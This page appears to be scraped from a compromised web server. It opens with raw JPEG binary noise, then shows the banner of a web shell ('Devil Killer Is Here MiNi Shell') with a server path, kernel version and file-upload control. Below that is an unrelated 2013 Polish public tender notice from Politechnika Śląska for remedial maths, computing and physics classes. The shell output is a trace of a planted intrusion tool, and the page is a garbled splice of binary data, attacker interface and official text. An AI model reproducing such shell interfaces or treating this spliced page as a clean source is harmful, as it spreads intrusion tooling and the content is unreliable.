JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130118/27276-N-2013.html

<p class="kh_header"><b>Gliwice: Opracowanie programu oraz prowadzenie zajęć wyrównawczych z przedmiotu: Matematyka, Informatyka oraz Fizyka. Oznaczenie sprawy: OZ/U/4/NC/13.</b><br>
<b>Numer ogłoszenia: 27276 - 2013; data zamieszczenia: 18.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Śląska , ul. Akademicka 2A, 44-100 Gliwice, woj. śląskie, tel. (032) 237 13 34, 2371335, faks 0322371334, 2372255, 2372660.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie programu oraz prowadzenie zajęć wyrównawczych z przedmiotu: Matematyka, Informatyka oraz Fizyka. Oznaczenie sprawy: OZ/U/4/NC/13..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie programu zajęć oraz przeprowadzenie zajęć wyrównawczych z Matematyki, Informatyki oraz Fizyki z elementami elektrotechniki. Przedmiot zamówienia został podzielony na 6 zadań: Zadanie 1- Opracowanie programu zajęć wyrównawczych z przedmiotu matematyka, Zadanie 2- Przeprowadzenie zajęć wyrównawczych z przedmiotu matematyka, Zadanie 3 - Opracowanie programu zajęć wyrównawczych z przedmiotu informatyka, Zadanie 4- Przeprowadzenie zajęć wyrówanwczych z przedmiotu informatyka, zadanie 5 - Opracowanie programu zajęć wyrównawczych z przedmiotu fizyka z elementami elektrotechniki, Zadanie 6 - Przeprowadzenie zajęć wyrównawczych z przedmiotu fizyka z elementami elektrotechniki. 2. (CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego). 3. Termin realizacji: Zad. 1, 3, 5: od dnia podpisania umowy do 31.03.2013 r., w szczególności:
- program zajęć wyrównawczych należy przygotować i złożyć w Biurze Projektu w formie elektronicznej oraz papierowej do 3 dni po podpisaniu umowy;
- materiały dydaktyczne należy przygotować i złożyć w Biurze Projektu w formie elektronicznej oraz papierowej co najmniej na 2 dni przed rozpoczęciem kolejnego bloku zajęć.
Zad. 2,4,6: od dnia podpisania umowy do 31.03.2013 r., w szczególności:
- przeprowadzenie zajęć dydaktycznych od dnia podpisania umowy do 31.03.2013 r., zgodnie z ustalonym harmonogramem zajęć (harmonogram zostanie ustalony przez Zamawiającego i Wykonawcę do 2 dni od dnia podpisania umowy);
- przekazanie Zamawiającemu list obecności po realizacji każdych zajęć - do 5 dni po zakończeniu realizacji każdych zajęć; ankiet ewaluacyjnych - do 5 dni od zakończenia ostatnich zajęć z danego przedmiotu;
- karty czasu pracy, ewidencji godzin i zadań realizowanych w projektach w ramach NSRO (jeśli dotyczy) - do 5 dni po zakończeniu danego miesiąca realizacji działań.
4. Przedmiot zamówienia jest realizowany zgodnie z projektem pn.: ZIP - Zostań Inżynierem Przyszłości współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IV Szkolnictwo wyższe i nauka, Działanie 4.1. Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy, Poddziałanie 4.1.2 Zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy.
Treść i forma zajęć powinny wspomagać osiągnięcie celu ogólnego projektu oraz jego pięciu celów szczegółowych. 
Celem ogólnym projektu ZIP - Zostań Inżynierem Przyszłości jest zwiększenie w 2015 roku liczby studentów oraz studentek rozpoczynających VII semestr studiów stacjonarnych I stopnia na kierunku Informatyka.
5. Wykonawca może złożyć ofertę w zadaniach 2, 4 i 6 pod warunkiem, że łącznie spełnia wszystkie wymogi i warunki opisane w SIWZ.
Na przykład: jeżeli Wykonawca dysponuje czteroma osobami spełniającymi wszystkie wymogi i warunki zawarte w SIWZ, może złożyć ofertę jedynie na dwa zadania np. 5 i 6, nie może już złożyć oferty na zadanie 2 i 4, może natomiast złożyć dodatkowo ofertę na zadania 1 i 3..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1
Wykonawca musi dysponować  minimum 1 osobą zdolną do wykonania zamówienia, która będzie odpowiedzialna m. in. za prawidłową realizację zamówienia, a ponadto posiada:
-co najmniej tytuł zawodowy magistra z matematyki lub tytuł naukowy z dyscypliny matematyka
-doświadczenie w prowadzeniu zajęć dydaktycznych z dziedziny matematyka przez co najmniej 2 semestry w ciągu ostatnich 3 lat.

Zadanie 2
Wykonawca musi dysponować  minimum 2 osobami zdolnymi do wykonania zamówienia, które będą odpowiedzialne m. in. za prawidłową realizację zamówienia, a ponadto posiadają:
-co najmniej tytuł zawodowy magistra z matematyki lub tytuł naukowy z dyscypliny matematyka;
-doświadczenie w prowadzeniu zajęć dydaktycznych z dziedziny matematyka przez co najmniej 2 semestry w ciągu ostatnich 3 lat.

Zadanie 3
Wykonawca musi dysponować  minimum 1 osobą zdolną do wykonania zamówienia, która będzie odpowiedzialna m. in. za prawidłową realizację zamówienia, a ponadto posiada:
-co najmniej tytuł zawodowy magistra z informatyki lub tytuł naukowy z dyscypliny informatyka;
-posiada doświadczenie w prowadzeniu zajęć dydaktycznych 
z dziedziny informatyka (w tym doświadczenie w prowadzeniu zajęć dydaktycznych z programowania w języku Pascal) przez co najmniej 2 semestry w ciągu ostatnich 3 lat.

Zadanie 4
Wykonawca musi dysponować minimum 4 osobami zdolnymi do wykonania zamówienia, które będą odpowiedzialne m. in. za prawidłową realizację zamówienia, a ponadto posiadają:
-co najmniej tytuł zawodowy magistra z informatyki lub tytuł naukowy z dyscypliny informatyka;
- posiada doświadczenie w prowadzeniu zajęć dydaktycznych 
z dziedziny informatyka (w tym doświadczenie w prowadzeniu zajęć dydaktycznych z programowania w języku Pascal) przez co najmniej 2 semestry w ciągu ostatnich 3 lat.

Zadanie 5
Wykonawca musi dysponować  minimum 1 osobą zdolną do wykonania zamówienia, która będzie odpowiedzialna m. in. za prawidłową realizację zamówienia, a ponadto posiada:
-posiada co najmniej tytuł zawodowy magistra z fizyki lub tytuł naukowy z dyscypliny fizyka;
-posiada doświadczenie w prowadzeniu zajęć dydaktycznych 
z dziedziny fizyka lub dziedziny elektrotechniki przez co najmniej 2 semestry w ciągu ostatnich 3 lat.

Zadanie 6
Wykonawca musi dysponować minimum 2 osobami zdolnymi do wykonania zamówienia, które będą odpowiedzialne m. in. za prawidłową realizację zamówienia, a ponadto posiadają:
-posiada co najmniej tytuł zawodowy magistra z fizyki lub tytuł naukowy z dyscypliny fizyka lub elektronika lub informatyka;
-posiada doświadczenie w prowadzeniu zajęć dydaktycznych 
z dziedziny fizyka lub dziedziny elektrotechniki przez co najmniej 2 semestry w ciągu ostatnich 3 lat.

Wszystkie osoby realizujące przedmiot zamówienia muszą spełniać wymagania opisane powyżej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">A) Wymagania dotyczące przedmiotu zamówienia jakie musi spełnić Wykonawca: 1. Zaoferowanie ceny, terminów, warunków realizacji zamówienia. B) Wymagane dokumenty izałączniki potwierdzające spełnienie wymagań dotyczących przedmiotu zamówienia: 1.1. Oferta Cenowa.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pisemne zobowiązanie innych podmiotów lub inne dokumenty potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów, o których mowa w pkt. III.3.4 niniejszego ogłoszenia- jeżeli dotyczy. Wymaga się aby pisemne zobowiązania innych podmiotów lub inne dokumenty potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów składane były w oryginale. 2) Jeżeli w miejscu zamieszkania osoby lub w kraju,w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt. III 4.3.1 niniejszego ogłoszenia, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 3) Dokumenty sporządzone w języku obcym powinny być złożone wraz z tłumaczeniem na język polski, za wyjątkiem dokumentów, których złożenie Zamawiający dopuścił w języku obcym. 4) Ww. dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (czytelny podpis lub podpis z imienną pieczątką) tj. przez osoby reprezentujące Wykonawcę lub przez pełnomocnika upoważnionego do złożenia oferty w jego imieniu. Sposób reprezentacji musi być zgodny z właściwym wypisem z rejestru. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz w przypadku innych podmiotów (oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przez Wykonawcę przy wykonywaniu zamówienia) kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów powinny być poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty. 5) W przypadku składania oświadczeń lub podpisywania jakichkolwiek dokumentów przez PEŁNOMOCNIKA wymagane jest dołączenie oryginału pełnomocnictwa z podpisem mocodawcy lub kopii uwierzytelnionej notarialnie. 6) Wykonawcy mogą wspólnie ubiegać się o udzielenia zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do tych Wykonawców. Należy dołączyć do oferty stosowne pełnomocnictwo do reprezentowania podmiotów występujących wspólnie w postępowaniu o udzielenie zamówienia; pełnomocnictwo to powinno być udzielone (podpisane) przez podmioty występujące wspólnie. Jeżeli oferta Wykonawców, występujących wspólnie zostanie wybrana, Zamawiający (przed zawarciem umowy) może żądać umowy regulującej ich współpracę. 7) Zamawiający nie wymaga, aby Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji zamówienia, przedkładał także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy, określonym w pkt. III.4.2) niniejszego ogłoszenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Nie będą możliwe istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem następujących przypadków: 
1. zmiany terminu realizacji zamówienia ze względu na:
-	przyczyny leżące po stronie Zamawiającego
-	inne niezawinione przyczyny spowodowane przez tzw. siłę wyższą np. pożar, zalanie itp., 
2. poprawy jakości lub innych parametrów charakterystycznych dla danej części usługi, 
3. zmiany w kolejności i terminach realizacji zamówienia, zmiany w kolejności i terminach płatności (w tym płatności częściowe - jeżeli dotyczy) za realizację zamówienia w sytuacji, kiedy są one korzystne dla Zamawiającego,
4. zmiany zakresu zamówienia wykonywanego przy pomocy podwykonawców (w przypadku zadeklarowania przez Wykonawcę realizacji zamówienia przy pomocy podwykonawców),
5. obniżenie ilości - wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany,
6. zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi kwalifikacjami zawodowymi, doświadczeniem, wykształceniem, o których mowa w SIWZ,
  7. zmiany miejsca prowadzenia zajęć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44-100 Gliwice, ul. Konarskiego 18, pok. 511..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2013 godzina 09:00, miejsce: Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44-100 Gliwice, ul. Konarskiego 18, pok. 511..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przedmiot zamówienia jest realizowany zgodnie z projektem pn.: ZIP - Zostań Inżynierem Przyszłości współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IV Szkolnictwo wyższe i nauka, Działanie 4.1. Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy, Poddziałanie 4.1.2 Zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy.
Treść i forma zajęć powinny wspomagać osiągnięcie celu ogólnego projektu oraz jego pięciu celów szczegółowych. 
Celem ogólnym projektu ZIP - Zostań Inżynierem Przyszłości jest zwiększenie w 2015 roku liczby studentów oraz studentek rozpoczynających VII semestr studiów stacjonarnych I stopnia na kierunku Informatyka.
2. Zamawiający będzie rozliczał się z Wykonawcą na podstawie sporządzonych przez Wykonawcę i zaakceptowanych przez Zamawiającego kart czasu pracy oraz ewidencji godzin i zadań realizowanych w projektach w ramach NSRO - jeżeli dotyczy. 
W zadaniu 1, 3, 5: Płatność jednorazowa po zakończeniu realizacji całego przedmiotu zamówienia. 
W zadaniu 2, 4, 6: Rozliczenie będzie prowadzone miesięcznie. 
3. Zamawiający zobowiązuje się dokonać zapłaty należności na rachunek Wykonawcy podany na fakturze, rachunku  w terminie do 30 dni od daty złożenia faktury/rachunku i spełnienia warunków jw. Zamawiający zobowiązuje się dokonać
 zapłaty należności na rachunek Wykonawcy podany na fakturze, rachunku w terminie do 30 dni od daty złożenia  faktury, rachunku i spełnienia warunków jw..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie programu zajęć wyrównawczych z przedmiotu matematyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na opracowaniu programu oraz materiałów dydaktycznych z zajęć wyrównawczych z przedmiotu Matematyka (w zakresie programu nauczania przewidzianego dla szkoły ponadgimnazjalnej) dla studentów i studentek I roku studiów na kierunku Informatyka na Wydziale Automatyki, Elektroniki i Informatyki Politechniki Śląskiej; opracowanie programu dla 20 godzin lekcyjnych zajęć wyrównawczych.
Do obowiązków Wykonawcy należy:
- Przygotowanie i złożenie w Biurze Projektu (inaczej Zamawiający) programu zajęć wyrównawczych. Wykonawca musi dostarczyć program zajęć w formie elektronicznej oraz papierowej do 3 dni po podpisaniu umowy.
- Przygotowanie i złożenie w Biurze Projektu materiałów dydaktycznych z zajęć wyrównawczych. Wykonawca musi dostarczyć materiały dydaktyczne w formie elektronicznej oraz papierowej co najmniej na 2 dni przed rozpoczęciem kolejnego bloku zajęć.
- Program zajęć oraz materiały dydaktyczne muszą być opracowane w formie elektronicznej, umożliwiającej dystrybucję przez serwis internetowy www. Szata graficzna musi być zgodna
z wytycznymi dot. oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Po podpisaniu umowy, Zamawiający przekaże w ciągu 2 dni wytyczne dotyczące oznakowania wszystkich materiałów zgodnie z identyfikacją graficzną projektu.

Zamawiający przewiduje, iż wykonawca powinien przepracować do 20 godzin, bez możliwości zwiększenia liczby godzin. Konieczność wypracowania większej liczby godzin niż przewidziano w zamówieniu, nie zwalnia wykonawcy z realizacji tego zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie zajęć wyrównawczych z przedmiotu matematyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na przeprowadzeniu zajęć wyrównawczych z przedmiotu Matematyka (w zakresie programu przygotowanego przez wykonawcę w ramach zadania nr 1) dla studentów oraz studentek I roku studiów na kierunku Informatyka na Wydziale Automatyki, Elektroniki i Informatyki Politechniki Śląskiej - 20 godzin lekcyjnych zajęć wyrównawczych (1 godzina lekcyjna = 45 minut) dla
1 grupy studentów oraz studentek (co najmniej 25 osób w grupie). Wykonawca będzie prowadzić zajęcia z 3 grupami, w różnym terminie. Tematy zajęć wyrównawczych z Matematyki określone w programie nauczania przewidzianego dla szkół ponadgimnazjalnych. Łączna liczba godzin: 60 godzin lekcyjnych.
Wymagania dot. przedmiotu zamówienia:
- Zajęcia prowadzone w języku polskim.
- Treść zajęć wyrównawczych musi odpowiadać założeniom programu przygotowanego w ramach zadania nr 1. 
- Na koniec semestru (na ostatnich zajęciach) wykonawca jest zobowiązany do przeprowadzenia ankiety ewaluacyjnej na formularzach dostarczonych przez Biuro Projektu. Ankieta będzie dotyczyła oceny merytorycznej i technicznej przebiegu zajęć.

Do obowiązków Wykonawcy należy:
- Ustalenie harmonogramu i miejsca zajęć (w uzgodnieniu z pracownikami Biura Projektu) - godziny zajęć muszą być ustalone z Zamawiającym tak, aby nie kolidowały z planowymi zajęciami dydaktycznymi dla studentów oraz studentek I roku studiów na kierunku Informatyka na Wydziale Automatyki, Elektroniki i Informatyki Politechniki Śląskiej; zajęcia mogą być prowadzone od poniedziałku do piątku w godzinach od 13:00 do 20:00 oraz w sobotę
w godzinach od 8:00 do 14:00. Szczegółowy harmonogram zajęć zostanie ustalony przez Zamawiającego i Wykonawcę do 2 dni od dnia podpisania umowy. Przedmiot zamówienia musi być zrealizowany od dnia podpisania umowy do 31 marca 2013 roku. 
- Przeprowadzenie zajęć zgodnie z ustalonym harmonogramem.
